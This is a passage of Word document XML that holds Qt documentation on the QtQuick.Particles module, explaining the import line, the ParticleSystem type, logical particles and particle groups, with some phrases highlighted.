      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module page.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that to use types from the particles module, you will need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the types with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Particles </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1428" w:name="_Toc483000837"/>
      <w:bookmarkStart w:id="1429" w:name="_Toc483003830"/>
      <w:bookmarkStart w:id="1430" w:name="_Toc483604183"/>
      <w:bookmarkStart w:id="1431" w:name="_Toc483605403"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The ParticleSystem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1428"/>
      <w:bookmarkEnd w:id="1429"/>
      <w:bookmarkEnd w:id="1430"/>
      <w:bookmarkEnd w:id="1431"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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This particle system </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains four main types</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of QML types:</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1827" w:history="1">
        <w:r w:rsidRPr="00791A59">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Painters, Emitters and Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1828" w:history="1">
        <w:r w:rsidRPr="00791A59">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type ties all the other types together</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manages the shared timeline</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Painters, Emitters and Affectors must all have the same</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1829" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be able to interact with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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You may </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have as many ParticleSystems as you want</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> subject to this constraint, so the logical separation is to have one</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1830" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for all the types that you want to interact, or just one if the number of types is small and they are easily kept under control..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1432" w:name="_Toc483000838"/>
      <w:bookmarkStart w:id="1433" w:name="_Toc483003831"/>
      <w:bookmarkStart w:id="1434" w:name="_Toc483604184"/>
      <w:bookmarkStart w:id="1435" w:name="_Toc483605404"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logical Particles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1432"/>
      <w:bookmarkEnd w:id="1433"/>
      <w:bookmarkEnd w:id="1434"/>
      <w:bookmarkEnd w:id="1435"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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All the </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>particle system types act on "logical particles"</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every particle has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logical representation inside the particle system</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and this is what the types act upon</w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Not every</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> logical particle needs </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be visualized</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and some logical particles </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could lead to multiple visual particles being drawn on screen</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1436" w:name="_Toc483000839"/>
      <w:bookmarkStart w:id="1437" w:name="_Toc483003832"/>
      <w:bookmarkStart w:id="1438" w:name="_Toc483604185"/>
      <w:bookmarkStart w:id="1439" w:name="_Toc483605405"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Particle Groups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1436"/>
      <w:bookmarkEnd w:id="1437"/>
      <w:bookmarkEnd w:id="1438"/>
      <w:bookmarkEnd w:id="1439"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every logical particle is a member of a particle group</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and each group is identified by a name. If no other group has been specified, a logical particle belongs to the group with </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the name ""</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the empty string), which acts the same as any other group. Groups are used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two purposes</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, for </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>controlling particles</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and because they can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic state transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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Groups control particles because you </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can never access an individual particle</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with any of the particle system types. All types act on groups as a whole, and so any particles that </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to behave differently from each other</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aside from the usual stochastic parameter variation) will </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to be in different groups</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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Particles </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also change groups dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When this happens the particles </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trajectory is unaltered</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be acted upon by different</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1831" w:anchor="particlepainters" w:history="1">
        <w:r w:rsidRPr="00E85C50">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainters</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
